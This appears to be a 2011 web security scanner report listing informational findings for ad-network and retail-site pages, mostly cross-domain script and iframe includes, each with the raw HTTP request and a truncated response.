GET /e/a-677/s-2140.xgi?na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y |
HTTP/1.1 200 OK Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Set-Cookie: na_id=20110515192708 Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com X-Powered-By: Jigawatts Content-type: text/html Date: Mon, 16 May 2011 01:33:20 GMT Server: lighttpd/1.4.18 Content-Length: 382 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> </head> <body> <iframe name="__bknsframe" src="http://tags.bluekai </iframe> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e/a-677/s-2140.xgi?na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_id=20110515192708 |
HTTP/1.1 200 OK Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Set-Cookie: na_id=20110515192708 Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:38:46 GMT; path=/; domain=.nexac.com Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:38:46 GMT; path=/; domain=.nexac.com X-Powered-By: Jigawatts Content-type: text/html Date: Mon, 16 May 2011 01:38:46 GMT Server: lighttpd/1.4.18 Content-Length: 526 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> </head> <body> <iframe name="__bknsframe" src="http://tags.bluekai </iframe> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1774243 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.travelguard User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Mon, 16 May 2011 01:44:06 GMT Expires: Mon, 16 May 2011 01:44:06 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 1893 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <img src="https://tag <img src="https://tag <img src="https://tag ...[SNIP]... </script> <script type="text/javascript" src="https://www </script> ...[SNIP]... <div style="display:inline;"> <img height="1" width="1" style="border-style:none; </div> </noscript><img width="1" height="1" src="https://secure <img height="1" width="1" style="border-style:none; ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1774243 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.travelguard User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Mon, 16 May 2011 01:44:06 GMT Expires: Mon, 16 May 2011 01:44:06 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 2190 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <img src="https://tag <img src="https://tag <img src="https://tag ...[SNIP]... </script> <script type="text/javascript" src="https://www </script> ...[SNIP]... <div style="display:inline;"> <img height="1" width="1" style="border-style:none; </div> </noscript> <img src="https://pixel ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1715989 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.acehardware User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Mon, 16 May 2011 01:42:51 GMT Expires: Mon, 16 May 2011 01:42:51 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 1023 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script> <script type="text/javascript" src="https://r.turn.com </script> <noscript> <img border="0" src="https://r.turn.com/r </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1564432 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.helzberg.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Mon, 16 May 2011 01:40:47 GMT Expires: Mon, 16 May 2011 01:40:47 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 2464 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <img height="1" width="1" src="http://view.atdmt <img src="http://ad.doubl <img src="http://action <img src="http://ads.adbrite <img src="http://image2 <img src="http://tag.admeld ...[SNIP]... </script> <script type="text/javascript" src="http://www </script> ...[SNIP]... <div style="display:inline;"> <img height="1" width="1" style="border-style:none; </div> </noscript><script src="http://action ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=2079557 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Mon, 16 May 2011 01:40:46 GMT Expires: Mon, 16 May 2011 01:40:46 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 1783 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script><img src="http://www.burstnet ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1770367 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Sun, 15 May 2011 20:26:56 GMT Expires: Sun, 15 May 2011 20:26:56 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 382 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR </body> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityj |
GET /activityj;src=2789293 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Mon, 16 May 2011 01:26:07 GMT Expires: Mon, 16 May 2011 01:26:07 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/javascript Content-Length: 213 X-XSS-Protection: 1; mode=block document.write('<img src="http://ads |
Severity: | Information |
Confidence: | Certain |
Host: | http://gannett.gcion.com |
Path: | /addyn/3.0/5111.1/809051 |
GET /addyn/3.0/5111.1/809051 Host: gannett.gcion.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT" Content-Type: application/x-javascript Content-Length: 942 Set-Cookie: JEB2=4DD077236E651A4 rubSect = ""; if (window.location.pathname else if (window.location.pathname else if (window.location.pathname ...[SNIP]... ubSect = 7106; else if (window.location.pathname else if (window.location.pathname else rubSect = 7102; document.write('<IFRAME SRC="http://optimized-by ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:32:38 GMT Server: cafe Cache-Control: private Content-Length: 2045 X-XSS-Protection: 1; mode=block <html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script ...[SNIP]... </script><script type="text/javascript" src="http://ad.turn.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:20:08 GMT Server: cafe Cache-Control: private Content-Length: 4679 X-XSS-Protection: 1; mode=block <html><head><style><!-- a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!-- (function(){window.ss ...[SNIP]... <div id=abgb><img src='http://pagead2 ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 15 May 2011 21:31:41 GMT Server: cafe Cache-Control: private Content-Length: 13811 X-XSS-Protection: 1; mode=block <!doctype html><html><head><style>a ...[SNIP]... <div style="right:2px;position ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:20:08 GMT Server: cafe Cache-Control: private Content-Length: 10190 X-XSS-Protection: 1; mode=block <!doctype html><html><head><style>a ...[SNIP]... <div style="right:2px;position ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: id=c60bd0733000097 |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 15 May 2011 21:33:58 GMT Server: cafe Cache-Control: private Content-Length: 14163 X-XSS-Protection: 1; mode=block <!doctype html><html><head><style>a ...[SNIP]... <div style="right:2px;position ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:23:58 GMT Server: cafe Cache-Control: private Content-Length: 4516 X-XSS-Protection: 1; mode=block <html><head><style><!-- a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!-- (function(){window.ss ...[SNIP]... <div id=abgb><img src='http://pagead2 ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:28:44 GMT Server: cafe Cache-Control: private Content-Length: 6662 X-XSS-Protection: 1; mode=block <!doctype html><html><head><style>a ...[SNIP]... <div style="right:2px;position ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:28:40 GMT Server: cafe Cache-Control: private Content-Length: 6951 X-XSS-Protection: 1; mode=block <!doctype html><html><head><style>a ...[SNIP]... <div style="right:2px;position ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:34:51 GMT Server: cafe Cache-Control: private Content-Length: 6726 X-XSS-Protection: 1; mode=block <!doctype html><html><head><style>a ...[SNIP]... <div style="right:2px;position ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:24:21 GMT Server: cafe Cache-Control: private Content-Length: 7255 X-XSS-Protection: 1; mode=block <!doctype html><html><head><style>a ...[SNIP]... <div style="right:2px;position ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://serv.adspeed.com |
Path: | /ad.php |
GET /ad.php?do=html&zid=3253 Host: serv.adspeed.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK P3P: policyref="http://serv Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Mon, 16 May 2011 01:20:32 GMT Server: AdSpeed/s5 Content-Length: 844 <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sony.links |
Path: | /pages/prices.asp |
GET /pages/prices.asp?nrgid Host: sony.links.channelin Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: serverstamp=4B88CCEA-94CF |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Content-Type: text/html Vary: Accept-Encoding Content-Length: 19529 Cache-Control: public, max-age=1549 Expires: Sun, 15 May 2011 20:52:22 GMT Date: Sun, 15 May 2011 20:26:33 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> <script type="text/javascript" src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://track.searchignite |
Path: | /si/CM/Tracking |
GET /si/CM/Tracking Host: track.searchignite.com Proxy-Connection: keep-alive Referer: http://www.travelguard User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Connection: close Date: Mon, 16 May 2011 01:44:00 GMT Server: Microsoft-IIS/6.0 P3P: CP="PUB OTRo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://dms.netmng.com/si Cache-Control: private Content-Type: text/html <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://dms.netmng </body> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://wow.weather.com |
Path: | /weather/wow/module |
GET /weather/wow/module Host: wow.weather.com Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:51 GMT Server: Apache SVRNAME: web2x07 Vary: Accept-Encoding Content-Length: 5455 Content-Type: text/html if (document.getElementById && !document.getElementById( { var head = document.getElements var link = document.createElement( ...[SNIP]... <TD valign="middle" align="center"><a href="http://www ...[SNIP]... <TD align="center" class="wowwxSmall"><a href="http://www ...[SNIP]... <TD align="center" class="wowwxLink10"><A HREF="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bhphotovideo |
Path: | /bnh/controller/home |
GET /bnh/controller/home?KW Host: www.bhphotovideo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=0pnRNQQMwR! |
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 X-Powered-By: Servlet/2.5 JSP/2.1 X-UA-Compatible: IE=EmulateIE7 Content-Length: 39479 Expires: Mon, 16 May 2011 01:41:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:41:44 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>B&H Photo Vi ...[SNIP]... <area shape="rect" coords="6,67,159,120" href="http://www <area shape="rect" coords="163,6,319,60" href="http://www <area shape="rect" coords="6,6,159,61" href="http://www ...[SNIP]... ape="poly" coords="317,118,317,66 <area shape="rect" coords="162,99,252,120" href="http://hdslr <area shape="rect" coords="324,5,478,99" href="https://secure ...[SNIP]... <li><a name="B&H_Insights" href="http://www ...[SNIP]... <li><a class="facebook" href="http://www.facebook ...[SNIP]... <li><a class="twitter" href="http://twitter.com ...[SNIP]... <li><a class="youTube" href="http://www.youtube ...[SNIP]... <li class="hackerSafe"><a class="hackerSafeLink" onclick="return widgets.popup(this, 'Mcafee', 'width=560px, scrollbars=yes');" target="_blank" href="http://www ...[SNIP]... <li class="cyberTrust"><a class="cyberTrustLink" onclick="return widgets.popup(this, 'Cyberrust', 'width=810px, scrollbars=yes');" href="http://secure ...[SNIP]... <li class="bbbOnline"><a class="bbbOnlineLink" onclick="return widgets.popup(this, 'BBB', 'width=800px, height=480px, scrollbars=yes');" href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cruisecritic |
Path: | /reviews/cruiseline.cfm |
GET /reviews/cruiseline.cfm Host: www.cruisecritic.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:26:39 GMT Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: SUBSCRIBENEWSLETTER=2 Vary: Accept-Encoding Content-Length: 47418 <html> <head> <title>Disney Cruise Line - Disney Cruises and Reviews - Cruise Critic</title> <meta name="description" content="Cruise Critic has 373 Disney cruise ...[SNIP]... <!-- begin topleft ad tag--> <iframe src="http://ad.doubl <script language="JavaScript" src="http://ad.doubl ...[SNIP]... <noscript><a href="http://ad ...[SNIP]... <td valign="top" width="225"> <iframe src="http://ad.doubl ...[SNIP]... <noscript><a href="http://ad ...[SNIP]... <li class="noMarginPadding"><a class="sprite fbIcon" href="http://www.facebook ...[SNIP]... <li class="noMarginPadding"><a class="sprite twitterIcon" href="http://twitter.com ...[SNIP]... <div style="margin-top:-30px; margin-left:-60px;"> <iframe frameborder="0" scrolling="no" allowtransparency="true" style="border: medium none; overflow: hidden; width: 200px; height: 62px;" src="http://www.facebook ...[SNIP]... <!-- begin right1 ad tag --> <iframe src="http://ad.doubl <script language="JavaScript" src="http://ad.doubl ...[SNIP]... <noscript><a href="http://ad ...[SNIP]... <!-- begin right2 ad tag --> <iframe src="http://ad.doubl <script language="JavaScript" src="http://ad.doubl ...[SNIP]... <noscript><a href="http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.29.50 X-Cnection: close Date: Sun, 15 May 2011 20:27:07 GMT Content-Length: 8508 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </title> <link type="text/css" rel="stylesheet" href="http://static.ak <script type="text/javascript" src="http://static.ak ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/likebox.php |
